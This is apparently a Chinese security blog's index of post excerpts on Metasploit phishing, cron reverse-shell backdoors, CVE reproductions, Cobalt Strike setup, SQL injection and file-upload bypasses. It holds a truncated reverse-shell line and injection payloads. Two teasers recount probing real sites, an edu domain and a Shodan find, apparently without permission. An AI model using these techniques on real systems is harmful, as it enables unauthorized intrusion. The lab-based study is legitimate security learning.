原创 MSF使用web_delivery模塊生成powershell腳本釣魚攻擊

環境: kali:192.168.10.128 windows server 2008R2:192.168.10.139 kali打開msf msf5 > use exploit/multi/script/web_delivery

原创 linux中的兩種後門方式

通過任務計劃反彈shell 環境: kali攻擊機ip:192.168.10.128 centos受害機:192.168.10.129 centos: 1.編寫腳本evil.sh #!/bin/bash bash -i >& /d

原创 CVE-2016-6515攻漏洞復現

簡述: Openssh7.3之前版本,sshd/auth-passwd.c/auth_password函數未限制密碼驗證中的密碼長度,遠程攻擊者通過較長的字符串,利用此漏洞可造成拒絕服務。 實驗環境: 攻擊機和靶機系統版本都是Ce

原创 安裝Cobalt strike

首先安裝jdk,建議把系統的openjdk全部卸載掉 apt-get remove openjdk* apt-get remove openjre* jdk1.8下載地址 在ubuntu安裝jdk的具體方法 安裝完jdk之後,把

原创 sqli-labs-master(聯合注入自動化腳本獲取數據)

字符型與數字型所使用的payload有所不同,但是大同小異,注意總結 一、獲取字段數和可插入位置: id=1' order by 3--+ id=-1' union select 1,2,3 --+ 二、獲取當前數據庫、當前

原创 Metasploit(msf)添加CVE-2019-0708攻擊套件

把攻擊套件壓縮包解壓 進入文件夾,分別把文件放進msf的文件夾 rdp.rb文件放到 /usr/share/metasploit-framework/lib/msf/core/exploit 目錄 rdp_scanner

原创 sqli-labs-master(盲註腳本自動獲取數據)

盲注 盲注顧名思義,只會返回True或者False,需要一個一個字符地去拆解表中內容,步驟相對聯合注入比較繁瑣,但找到規律也是很好理解的。 盲注需要理解掌握的幾個函數是ord(),ascii(),substr();具體在下文pay

原创 upload-labs-master(1-18關)

Pass-01 第一關爲前端檢測,可將webshell文件後綴現改爲jpg,然後用bp截包修改成php上傳即可。 Pass-02 第二關爲檢測文件類型,用bp截包把application/octet-stream修改爲image

原创 CVE-2020-0796(SMBv3)漏洞復現獲取shell

SMBv3介紹 服務器消息塊(SMB),是一個網絡通信協議,用於提供共享訪問到文件,打印機和串行端口的節點之間的網絡上。它還提供了經過身份驗證的進程間通信機制。SMB的大多數用法涉及運行Microsoft Windows的計算機,

原创 記一次失敗的滲透測試..

0x01 fofa無法搜索,使用googlehack找目標 發現其中一個edu與我比較有緣,就決定給它免費檢測:) 獲取到網站基本信息,腳本語言php,apache中間件,服務器是Centos。 0x02 一開始覺得這網站很

原创 文件上傳繞過的一些思路

如果只有前端檢查直接改爲shell.php.jpg繞過檢測然後再上傳截包改爲shell.php 如果代碼檢查文件類型則截包改文件類型改成 image/png 0x00截斷(shell.php空格.jpg再截包把%20改爲0

原创 一次實戰中使用xp_cmdshell建表寫一句話

0x00 信息蒐集 閒着無聊,去shodan逛一逛發現一個可疑站點,抱試試水的心態點了進去,看到url有傳參,習慣性加單引號發現報錯,並且爆出路徑信息c:\code\css\,突然一驚,難道有注入? wappalyzer獲取到的